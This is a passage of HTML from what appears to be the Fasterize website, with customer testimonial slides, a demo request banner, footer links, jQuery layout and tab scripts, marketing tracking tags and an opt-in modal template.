src="data:image/png;base64,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" class="lsow-image full" alt=""> </div> <div class="lsow-text"> <h4 class="lsow-author-name">Caudalie</h4> <div class="lsow-author-credentials">Guillaume Delafosse, Technical leader WEB and CRM</div> </div> </div> </div> </div> <div class="lsow-slide lsow-testimonial-wrapper"> <div class="lsow-testimonial"> <div class="lsow-testimonial-text"> <i class="lsow-icon-quote"></i> <p><em>In ecommerce, front-end optimization is very important. [...] With Fasterize, we observed a 30% decrease in perceived loading time.</em></p> </div> <div class="lsow-testimonial-user"> <div class="lsow-image-wrapper"> <img width="150" height="150" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJYAAACWCAMAAAAL34HQAAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAACTUExURUxpcb8yGLu7vcDAwwEBAsfIyfj29f///////8VHMMM+JrsmC/z8++/v7+fn6FVUVtDR0t/f4NjY2Xd3eC4tMLa2uPTb1hUUFuavpeKildd/buq+tWhoakJBQ85iT8pWQNJwXO/Ox9+YirGxs4KCg4qJi/jq55GQkduLfLcZAaysrZaVlqioqZycnaGgorEHAKSkptwDWokAAAAIdFJOUwD////////uv3p0wAAACdxJREFUeNrsmIlyo7oShkcgdIQQ+74vBgx4y/s/3W0J4yzjnCSTqTqpulbVjAM28NH96++Wfv16jMd4jMd4jMd4jMd4jMd4jMd4jMd4jMd4jMd4jP+T8c9PHL9+0Z84fibWPw+sB9YD6/3BfyJW1FRNR34aVsq6KKka8rOwUhTRjNOq/Y+xSJukU5fm441qzGlSj/8pVp6J0aVTXdcJUBmROJux9r/UVt5kaZbn6Zh1tM2QnuqCKtObr8WKE8L/HhZpmmRK2ikfkV5Vbd42l5TSFtXRV25tOqqqqJrmmX8HK6qnNG3SSWdtWtGkSqZxmqN0zr4EpSmq4zmaAsPhfwGr1TsyJaRCUaKDmBJDbydSzSz5yn2tUJNB4pamaopGvo01AkWSdyAkShvG0yyrknoaL/mXqHbOTRGSi38Xq5rSfJovE0V1hhBp0yRv0y5qvuIMZqg+c3DB5X4TK21oDvMuMcYWIRblM2JzkhtJMrPu03fVwpcYpgJg/FtYpMqrFtDGS0bHdqS6TvO5bfOoM9hcfTJglqK+mn1ApZrfwkqn5FKPVdoYUQLuMOYoqrvWqMbO0HXjk2bqKOorjbsQLusbWGRi6RRVUXa5JKPRZHNDq4seZRHKM8DSEfoMF4jpdXCsb0arQnVS0SqlST6yGmbiJR+bsavbbEQMIcH1CUclqqq+lpLnfkfyOQSG11mdZNAnoDpvkN7SPBnZDGEc80xw6bf07O3CF59hURTDGgxrf+ACy1l8f9jvD/u9PyiU9IXv+wt83cOwxAd8s/d7bVWeP4hDOA7vY1VJ24zJJcuzziDJZdahY6jQpY0yMgvbEok0bl7v+BjbMkWx7a3RcTE+QhJVa4+DoxJjX/FxQMlTgLEPDOYTjo8mfMQ4UJQeLhdv4x4wLpUQjuO7WB0DxVcdlMA0AlUlEY10llN2IbRGMjsij8azr9oY9zJuyvUEkJTi/d0+hgeWGM77cIID5TXCe/lxkO9jxriQhwVew27z37G4yFyXJdlIs6qugAlaCCjRGcQnnXVd1J4cMR3V28VkKGR06H63nVAw9uD91VCB2hPgRQSDWs6AgzX355dY8FrB9fWKd7XFQUcCq8mTDgKVMzbXECWwVDoBlYGEabWM6cZWHIlPIY+QnOGKFfbwBF9kUfMUB6K1yJ8p7mnDOg1r0Fasco3SehEtlLuST2qI1pSwnHV1RSBG00zSuaO8Aapr8iIRrmrDKgjcObZuWINDVSzSB0alae6KRZSQKxvW4YZlcdPHNrli2buTjXf3Z2Jq1DWK2g6RqRlRNjEozyPtkHAsXQaprUFcbDMJUkCCQL30vKxFxt4pYYyfhLoUzdECkWFTUUy627AG33IcB4CCvoyxdtOoHT7ZOHwPC8xJ56Sp56Q1UJ22Y9Qxg0kqndVVxSSh0T1jUQcm2XG94RIUdlFK0ZvQbDkBvL+7E03NctNWD1VcdQuYg0d841iTaN+PFq+BapxQ10Y5GXMSwfILbVCCC3Qm/0DNhiUqyg7jYO1iCvHhSdFDvyWwFnMnDkS01ksOByiQqtULbZ0wduiHkqcjY8ZEu5nprKqarGGGgfR7g22W6ksTHa63d17ql3qqF+DBMjc/W22+1ABLoUcpeZiI/OUl1B/uYLVIR91kQCySrp630NzDYtHaFsNjubyrxCrtq5yxtbZ/8fVpK4HGuWvbounxwKiC1bfKFVZ+kkHK8reZaIiaB//goYS9CyWymMsUlkFgS4ISprZl4xiS6hUBTAKh5V2A49i+qtoEhwvg5wRoNc+P4RsQFoCXHlVtOCyGHiY1uYPVrTNuLS8Teh/KkM7FIUHcWrMAqTJVyw1N6JY9y1IhY+7+qO6Ww6otKbbT4snG1TN3rgXaEweuAm8SuhYYcKi5Fv0XrDm9hu4OEbiWocNa++OWaweojuOJlL0a7s76WgdxxTKkWzb3osVqcIgOrGz6sGsWVMImtLdtvKbyr2Glxqrn8fb321hlPEpE+rP0M7G6y0XeRu9DrFYGyJCPbO5iXf2KZvm7i/uV5rglylVdT3NeYb27ZCTv+tYNCzqaO1zGNXmNNAi16M+9cNRDMRx9H+46HA7CUl277wfZHj7BNCtOtn2iJ1sL4Wd9CZXHP4nLwmLf7wvNhcOTvYiepx/uunyFZBIzLtawd7F0vu4KrjEJsKfZWKUaFF4NrKIsLbMMwI5K4oETWcLviW1Dye7pObBcHFga2JePFy2OSe8v+KnvSYk1y/fBysB0j/dq4rSKa27SrLpSIYReKn6t0em1QfVFNxnDf2CbMLkHaaMLWKcrys2RlsIztSdLwz55gijGNlUghwr8zhe/9aBWm3AZ/CUs9Uhd5x5Wa2wsW9UxMiiL6LccXqVVxFx0liY8b4EnBGvPSyAoYFNQ5iRWqJpeGTiiqgflInx8h/enUuRLk7W6x4oNJm+B+z6LkLzA4vVrV2CSo62NW9GRy9eo4huWLCuEgr371oZl4sAUWD4NJFZIoY/pBwe61dKzPYF1WCu3JppqwLJCKapT/NxxvcSSvfFLKXXXqbDRGlJU2WamPhaxgTInOnrPO4PMRLNTiD5qD5m0sSjkmshWrDgQzpJAFYAkwomerkmkMol0R8QSZOsz3mAR/WW40OZOuXGdAEYtJ+l1JrsBPitlyfmCS+0Yg6jis2oHllMGuyU4g3vFZb+u2crY1bQTjhclHkgBTD3ec+KD5qhV4pNmB9yOw118vr98TV6Eiz2vVJsLk/2E7JvrjdY5KscF0sB34W53PkJmw+G0cE/zhuEgjQtm2PlacaCJ3g+HcDmDqSlPJg3P3HxSYHXmHpUl3DuUHPeD994exEsbNW5eTtI2FWsLUZam+sMNCM27uy3hud6nd9/eYD3r6IWpr5lEMlgJ+mjXxlM0xblzGsqQ+ultrrc7Nu1zR8peEXAp+GT+cFPQglWPcqdLgFUHcHl/hgX6vnKxeXoV8+qSQEf98QYqUdW3OzYyi7B0FHXb+cNNynxdgDHjTVM1zV02f2YD1RNhecPFRafjrlz8j7BoVItVBntLkMwz+9S+PFd/k5Gphv9r1w56EATBMABPHG7GFwO32vQQqBc59f//XR+Otea0oR1q632OHuqN0IC3+RBkzpVz7LxaF0z867P4tqgt1JQ5X+dVVilkWlGTNqNI668yTryMk8H1cuXqC+WGPn0sXvx5db/lVxhaxM0+RzD8UGikGJ8DVKWJT4dicbDuFIKKO2lXqxCKbl+vIuOA8ftHl/Ll9iN+gJXx0vltG7Rd3FHfesdzrHZ+2F2LkY2tCgfgeIvOx0pjjIwDScdrTjpaT5O2De98rKatF64+iPUliIVYiIVY2372L4sAAAAAAAAAAAAAAAAAf+UBTUqzWDjrYnEAAAAASUVORK5CYII=" class="lsow-image full" alt=""> </div> <div class="lsow-text"> <h4 class="lsow-author-name">Nature &amp; Découvertes</h4> <div class="lsow-author-credentials">Jean-Benoit Leviel, CTO</div> </div> </div> </div> </div> <div class="lsow-slide lsow-testimonial-wrapper"> <div class="lsow-testimonial"> <div class="lsow-testimonial-text"> <i class="lsow-icon-quote"></i> <p><em>We saw several effects, notably an increase in page views by users and a reduction of our bounce rate.</em></p> </div> <div class="lsow-testimonial-user"> <div class="lsow-image-wrapper"> <img width="150" height="150" src="https://www.fasterize.com/wp-content/uploads/2017/01/happy-view-150x150.png?frz-v=454" class="lsow-image full" alt=""> </div> <div class="lsow-text"> <h4 class="lsow-author-name">Happy View</h4> <div class="lsow-author-credentials">François Raballand, CTO</div> </div> </div> </div> </div> </div> </div></div></div></div></div><div id="pg-776-2" class="panel-grid panel-no-style" ><div id="pgc-776-2-0" class="panel-grid-cell" ><div id="panel-776-2-0-0" class="so-panel widget widget_text panel-first-child panel-last-child" data-index="2" > <div class="textwidget"><div id="banner"> <section class="container"> <div class="row"> <div> <p style="text-align:center;">Discover the Fasterize impact on your website, <br/>ask a demo!</p> </div> <br/> <div align="center"> <a href="http://info.fasterize.com/ask-for-a-demo" class="btn btn-flame btn-lg">I want a demo!</a> </div> </div></section> </div></div> </div></div></div></div> </div></div></div><!-- #content --> <footer> <section class="container"> <div class="row"> <div class="col-sm-3"> <h3>Useful links</h3> <div class="menu-footer-menu-utils-en-container"><ul id="menu-footer-menu-utils-en" class="list-unstyled"><li id="menu-item-846" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-846"><a href="https://www.fasterize.com/en/blog/">Blog</a></li> <li id="menu-item-1188" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1188"><a href="https://www.fasterize.com/en/white-papers/">White Papers</a></li> <li id="menu-item-847" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-847"><a href="https://www.fasterize.com/en/partners/">Partnership</a></li> <li id="menu-item-848" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-848"><a href="http://www.fasterize.com/en/press-room/">Press room</a></li> <li id="menu-item-1691" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1691"><a href="https://www.fasterize.com/en/pricing/">Pricing</a></li> </ul></div> </div> <div class="col-sm-3"> <h3>Company</h3> <div class="menu-footer-menu-company-en-container"><ul id="menu-footer-menu-company-en" class="list-unstyled"><li id="menu-item-3113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3113"><a href="https://www.fasterize.com/en/who-are-we/">Who are we?</a></li> <li id="menu-item-855" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-855"><a href="https://www.fasterize.com/en/privacy-policy/">Privacy policy</a></li> <li id="menu-item-3635" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3635"><a href="https://www.fasterize.com/en/clients/">Our clients</a></li> <li id="menu-item-2511" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2511"><a href="https://www.fasterize.com/en/contact-page/">Contact us!</a></li> </ul></div> </div> <div class="col-sm-3"> <h3>Customer</h3> <div class="menu-footer-menu-customer-en-container"><ul id="menu-footer-menu-customer-en" class="list-unstyled"><li id="menu-item-858" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-858"><a href="https://my.fasterize.com/fr/dashboard">Log in</a></li> <li id="menu-item-859" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-859"><a href="https://support.fasterize.com/en/support/home">Documentation</a></li> <li id="menu-item-860" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-860"><a href="https://support.fasterize.com/en/support/home">FAQ</a></li> <li id="menu-item-861" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-861"><a href="http://status.fasterize.com/">Status</a></li> <li id="menu-item-2510" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2510"><a href="https://www.fasterize.com/en/tos/">Terms and Conditions</a></li> </ul></div> </div> <div class="col-sm-3"> <h3>Social</h3> <div class="menu-footer-menu-social-container"><ul id="menu-footer-menu-social" class="list-unstyled"><li id="menu-item-806" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-806"><a href="https://twitter.com/fasterize">Twitter</a></li> <li id="menu-item-807" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-807"><a href="https://www.linkedin.com/company/fasterize">LinkedIn</a></li> <li id="menu-item-809" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-809"><a href="https://github.com/fasterize">Github</a></li> </ul></div> </div> </div> </div> <div class="row"> <div class="text-center legal_mention"> fasterize © 2019 </div> </div> </section> </footer> </div><!-- #page --> <script type="text/frzjs" orig_index="6"> jQuery(document).ready(function($){ equalheight = function(container){ var currentTallest = 0, currentRowStart = 0, rowDivs = new Array(), $el, topPosition = 0; $(container).each(function() { $el = $(this); $($el).height('auto') topPostion = $el.position().top; if (currentRowStart != topPostion) { for (currentDiv = 0 ; currentDiv < rowDivs.length ; currentDiv++) { rowDivs[currentDiv].height(currentTallest); } rowDivs.length = 0; // empty the array currentRowStart = topPostion; currentTallest = $el.height(); rowDivs.push($el); } else { rowDivs.push($el); currentTallest = (currentTallest < $el.height()) ? ($el.height()) : (currentTallest); } for (currentDiv = 0 ; currentDiv < rowDivs.length ; currentDiv++) { rowDivs[currentDiv].height(currentTallest); } }); } $(window).load(function() { equalheight('.all_main .auto_height'); }); $(window).resize(function(){ equalheight('.all_main .auto_height'); }); }); </script> <script type="text/frzjs" orig_index="7"> // tabs jQuery(document).ready(function($){ (function ($) { $('.soua-tab ul.soua-tabs').addClass('active').find('> li:eq(0)').addClass('current'); $('.soua-tab ul.soua-tabs li a').click(function (g) { var tab = $(this).closest('.soua-tab'), index = $(this).closest('li').index(); tab.find('ul.soua-tabs > li').removeClass('current'); $(this).closest('li').addClass('current'); tab.find('.tab_content').find('div.tabs_item').not('div.tabs_item:eq(' + index + ')').slideUp(); tab.find('.tab_content').find('div.tabs_item:eq(' + index + ')').slideDown(); g.preventDefault(); } ); //accordion // $('.accordion > li:eq(0) a').addClass('active').next().slideDown(); $('.soua-main .soua-accordion-title').click(function(j) { var dropDown = $(this).closest('.soua-accordion').find('.soua-accordion-content'); $(this).closest('.soua-accordion').find('.soua-accordion-content').not(dropDown).slideUp(); if ($(this).hasClass('active')) { $(this).removeClass('active'); } else { $(this).closest('.soua-accordion').find('.soua-accordion-title .active').removeClass('active'); $(this).addClass('active'); } dropDown.stop(false, true).slideToggle(); j.preventDefault(); }); })(jQuery); }); </script> <!-- Azalead Tracking Code --> <script src="//b2btagmgr.azalead.com/tag?az=aWRTdWJzY3JpYmVyPTExNzImaWRTaXRlPTExNTAmb3JpZ2luPXd3dy5mYXN0ZXJpemUuY29tLyZjdXN0b209bm9uZQ==" type="application/javascript"></script> <!-- End Azalead Tracking Code --> <style type="text/css"></style><script async type="text/frzjs" orig_index="8">(function(s,u,m,o,j,v){j=u.createElement(m);v=u.getElementsByTagName(m)[0];j.async=1;j.src=o;j.dataset.sumoSiteId='20bc10002c1eb000d84a3100b249200002e96d0083105000c7997d0004c98d00';j.dataset.sumoPlatform='wordpress';v.parentNode.insertBefore(j,v)})(window,document,'script','//load.sumo.com/');</script> <script type="text/frzjs" orig_index="9"> var ajaxurl = "https://www.fasterize.com/wp-admin/admin-ajax.php"; function sumo_add_woocommerce_coupon(code) { jQuery.post(ajaxurl, { action: 'sumo_add_woocommerce_coupon', code: code, }); } function sumo_remove_woocommerce_coupon(code) { jQuery.post(ajaxurl, { action: 'sumo_remove_woocommerce_coupon', code: code, }); } function sumo_get_woocommerce_cart_subtotal(callback) { jQuery.ajax({ method: 'POST', url: ajaxurl, dataType: 'html', data: { action: 'sumo_get_woocommerce_cart_subtotal', }, success: function(subtotal) { return callback(null, subtotal); }, error: function(err) { return callback(err, 0); } }); } </script> <style type="text/css" id="hustle-module-styles"> .module_id_14 .hustle-modal .hustle-modal-image{ background-color: rgba(53,65,74,1); } .module_id_14 .hustle-modal .hustle-modal-image{ background-color: rgba(53,65,74,1); } .module_id_14 .hustle-modal .hustle-modal-body{ background-color: #ffffff; } .module_id_14 .hustle-modal .hustle-modal-title{ color: #333333; } .module_id_14 .hustle-modal .hustle-modal-subtitle{ color: #333333; } .module_id_14 .hustle-modal a.hustle-modal-cta{ color: rgba(255,255,255,1); background-color: #164a6e; border-radius: 5px; } .module_id_14 .hustle-modal a.hustle-modal-cta:hover { color: rgba(255,255,255,1); background-color: #164a6e; } .module_id_14 .hustle-modal .hustle-modal-message, .hustle-modal .hustle-gdpr-content{ color: rgba(173,181,183,1); } .module_id_14 .hustle-modal .hustle-modal-message blockquote{ border-left-color: #164a6e; } .module_id_14 .hustle-modal .hustle-modal-message a{ color: #164a6e; } .module_id_14 .hustle-modal .hustle-modal-message a:hover { color: #164a6e; } .module_id_14 .hustle-modal article a{ color: #164a6e; } .module_id_14 .hustle-modal article a:hover { color: #164a6e; } .module_id_14 .wpmudev-modal-mask{ background-color: rgba(51,51,51,0.9); } .module_id_14 .hustle-modal .hustle-modal-close svg path{ fill: rgba(56,197,181,1); } .module_id_14 .hustle-modal .hustle-modal-close svg path:hover { fill: rgba(73,226,209,1); } .module_id_14 .hustle-modal .hustle-modal-close svg path:active { fill: rgba(73,226,209,1); } .module_id_14 .hustle-modal-image img{ object-position: center center; } .module_id_14 .hustle-modal .hustle-modal-body{ border: 3px solid rgba(218,218,218,1); border-radius: 5px; }</style> <script id="wpmudev-hustle-modal-with-optin-tpl" type="text/template"> <# var have_mc_group = !_.isEmpty( content.args ) && 'object' === typeof content.args.group, has_args = !_.isEmpty( content.args ) && 'object' === typeof content.args; var show_recaptcha = false; if ( 'object' !== typeof content.form_elements && '' !== content.form_elements ) { content.form_elements = JSON.parse(content.form_elements); } #> <div class="hustle-modal hustle-modal-{{design.form_layout}} {{ ( ( ( '' !== settings.animation_in && 'no_animation' !== settings.animation_in ) || ( '' !== settings.animation_out && 'no_animation' !== settings.animation_out ) ) && ( 'undefined' === typeof is_preview || _.isFalse( is_preview ) ) ) ? 'hustle-animated' : 'hustle-modal-static' }}"> <# if ( 'embedded' !== module_type ) { #> <div class="hustle-modal-close" aria-label="Close modal"><svg width="150" height="150" viewBox="0 0 150 150" xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" class="hustle-icon hustle-i_close" aria-hidden="true"><path d="M91.667 75L150 16.667 133.333 0 75 58.333 16.667 0 0 16.667 58.333 75 0 133.333 16.667 150 75 91.667 133.333 150 150 133.333 91.667 75z" fill-rule="evenodd"/></svg></div> <# } #> <# if ( "show_success" === content.after_successful_submission ) { #> <div class="hustle-modal-success"> <div class="hustle-modal-success_icon" aria-hidden="true"><svg xmlns="http://www.w3.org/2000/svg" width="50" height="38" viewBox="0 0 50 38" preserveAspectRatio="none" class="hustle-icon hustle-i_checkmark"><path d="M45.114.46c-.61-.614-1.604-.614-2.21 0L19.607 23.65c-.61.618-1.607.618-2.213 0L7.186 13.254c-.302-.308-.698-.46-1.096-.462-.402-.002-.81.15-1.116.462L.464 17.31c-.3.307-.464.693-.464 1.095 0 .404.163.827.465 1.134l10.293 10.8c.608.617 1.606 1.617 2.213 2.23l4.426 4.46c.61.61 1.602.61 2.213 0L49.54 7.15c.61-.61.61-1.617 0-2.23L45.114.46z"/></svg></div> <div class="hustle-modal-success_message">{{{content.success_message}}}</div> </div> <# } #> <div class="hustle-modal-body<# if ( ( 'two' === design.form_layout || 'three' === design.form_layout ) && 'left' !== design.feature_image_position ) { #> hustle-modal-image_right<# } #><# if ( 'four' === design.form_layout && 'left' !== design.feature_image_position ) { #> hustle-modal-image_right<# } #>"> <# if ( 'one' === design.form_layout ) { #> <# if ( '' !== content.main_content || ( _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) || ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) || ( _.isTrue( content.show_cta ) && '' !== content.cta_label ) ) { #> <section class="hustle-modal-image_{{ design.feature_image_position }}"> <# if ( ( 'left' === design.feature_image_position || 'above' === design.feature_image_position ) && _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue(content.feature_image_hide_on_mobile) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> <# if ( ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) || '' !== content.main_content || ( _.isTrue( content.show_cta ) && '' !== content.cta_label ) ) { #> <article> <div class="hustle-modal-article"> <# if ( _.isTrue( content.has_title ) && ( '' !== content.title || '' !== content.sub_title ) ) { #> <hgroup> <# if ( '' !== content.title ) { #> <h1 class="hustle-modal-title">{{ content.title }}</h1> <# } #> <# if ( '' !== content.sub_title ) { #> <h2 class="hustle-modal-subtitle">{{ content.sub_title }}</h2> <# } #> </hgroup> <# } #> {{{ content.main_content }}} <# if ( _.isTrue( content.show_cta ) && ( '' !== content.cta_label && '' !== content.cta_url ) ) { #> <div class="hustle-modal-footer"> <a target="_{{ content.cta_target }}" href="{{ content.cta_url }}" class="hustle-modal-cta">{{ content.cta_label }}</a> </div> <# } #> </div> </article> <# } #> <# if ( ( 'right' === design.feature_image_position || 'below' === design.feature_image_position ) && _.isTrue( content.use_feature_image ) && '' !== content.feature_image ) { #> <div class="hustle-modal-image hustle-modal-image_{{ design.feature_image_fit }}<# if ( _.isTrue(content.feature_image_hide_on_mobile) ) { #> hustle-modal-mobile_hidden<# } #>"> <# if ( 'contain' === design.feature_image_fit || 'cover' === design.feature_image_fit ) { #> <# if ( 'custom' !== design.feature_image_horizontal || 'custom' !== design.feature_image_vertical ) { #> <img src="{{ content.feature_image }}" class="hustle-modal-image_{{ design.feature_image_horizontal }}{{ design.feature_image_vertical }}"> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> <# } else { #> <img src="{{ content.feature_image }}"> <# } #> </div> <# } #> </section> <# } #> <footer> <form class="hustle-modal-optin_form {{ ( _.isTrue(have_mc_group) && 'hidden' !== content.args.group.type ) ? 'hustle-modal-optin_groups' : '' }} {{ ( 'separated' === design.form_fields_proximity ) ? 'hustle-modal-optin_separated' : '' }}" role="form"> <# if ( _.isTrue( have_mc_group ) && 'hidden' !== content.args.group.type ) { #><div class="hustle-modal-optin_group"><# } #> <# if ( 'undefined' !== typeof content.form_elements && !_.isEmpty( content.form_elements ) ) { #> <# _.each( content.form_elements, function( element, key ) { var element_type = element.type.toLowerCase(); if ( 'recaptcha' === element_type ) { show_recaptcha = true; return; } if ( 'name' === element_type || 'address' === element_type || 'phone' === element_type ) { var input_type = 'text'; } else { var input_type = element_type; } #> <# if ( 'submit' !== key ) { #> <div class="hustle-modal-optin_field {{ ( 'none' !== design.form_fields_icon ) ? 'hustle-modal-field_with_icon' : '' }}"> <input name="{{key}}" class="{{ ( _.isTrue( element.required ) ) ? 'required' : '' }}" type="{{input_type}}" data-error="Please, provide {{element.label.toLowerCase()}}."> <label> <# if ( "none" !== design.form_fields_icon ) { #> <span class="hustle-modal-optin_icon{{ ( 'animated' === design.form_fields_icon ) ? ' hustle-modal-optin_animated' : '' }}"> <# if ( 'email' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="11" viewBox="0 0 14 11" preserveAspectRatio="none" class="hustle-icon hustle-i_email"><path fill-rule="evenodd" d="M.206 1.112L7 7l6.793-5.887c.132.266.207.564.207.88v7.015c0 1.1-.897 1.992-2.006 1.992H2.006C.898 11 0 10.1 0 9.008V1.992c0-.316.074-.615.206-.88zM.94.305C1.247.112 1.613 0 2.005 0h9.988c.392 0 .757.112 1.066.306L7 5.5.94.305z"/></svg> <# } #> <# if ( 'name' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="11" height="14" viewBox="0 0 11 14" preserveAspectRatio="none" class="hustle-icon hustle-i_user"><path fill-rule="evenodd" d="M1.632 6.785c.917 1.118 2.31 1.83 3.868 1.83 1.56 0 2.95-.712 3.868-1.83C10.376 7.533 11 8.787 11 10.8c0 2-2.75 2.5-5.5 2.5S0 12.8 0 10.8c0-2.013.624-3.267 1.632-4.015zM5.5 7C3.567 7 2 5.433 2 3.5S3.567 0 5.5 0 9 1.567 9 3.5 7.433 7 5.5 7z"/></svg> <# } #> <# if ( 'address' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="10" height="15" viewBox="0 0 10 15" preserveAspectRatio="none" class="hustle-icon hustle-i_pin"><path fill-rule="evenodd" d="M5 0c2.442 0 5 1 5 4.5S6.178 12.904 5 15C3.805 12.904 0 8 0 4.5S2.54 0 5 0zm0 6.5c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2z"/></svg> <# } #> <# if ( 'phone' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 14 14" preserveAspectRatio="none" class="hustle-icon hustle-i_phone"><path fill-rule="evenodd" d="M9.947 13.855s-2.94-1.157-5.795-4.01C1.3 6.99.14 4.046.14 4.046c-.28-.605-.125-1.48.347-1.953L2.38.204c.314-.316.746-.258.964.13l1.63 2.91c.218.39.14.96-.177 1.276l-.614.613s.903 1.495 2.044 2.637c1.142 1.14 2.58 1.986 2.58 1.986l.613-.613c.316-.316.886-.394 1.274-.174l2.968 1.68c.388.22.448.652.132.968l-1.892 1.89c-.473.475-1.35.638-1.955.347z"/></svg> <# } #> <# if ( 'text' === element_type ) { #> <svg xmlns="http://www.w3.org/2000/svg" width="12" height="13" 